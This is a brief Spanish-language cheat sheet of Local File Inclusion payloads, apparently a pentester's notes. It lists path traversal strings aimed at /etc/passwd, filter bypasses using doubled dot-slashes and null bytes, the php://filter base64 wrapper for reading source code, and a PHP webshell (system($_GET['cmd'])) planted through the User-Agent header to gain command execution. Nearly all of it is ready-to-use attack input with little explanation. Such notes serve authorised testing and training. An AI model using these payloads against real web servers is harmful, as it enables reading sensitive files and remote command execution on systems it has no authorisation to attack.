📂LFI
Parámetro que veo, parámetro que testeo
Simple Path Traversal:
http://url/index.php?lang=../../../../../../etc/passwdDoble dot-slash
http://url/index.php?lang=....//....//....//....//etc/passwdBypassing Filtros:
Función 'Include'
<?PHP
include ("languages/".$_GET['lang']);
?>languages/../../../../etc/passwd # En este caso pide incluir 'languages'Extensión automática:
Null Bytes
/?parametro=/etc/passwd%00
/?parametro=/etc/passwd%2500PHP Wrapper - Filtro base64
/?parametro=php://filter/read=convert.base64-encode/resource=<payload>-------------------------------------------------------------------------------------
Webshell en User-Agent con Burpsuite:
<?php system($_GET['cmd']);?>Última actualización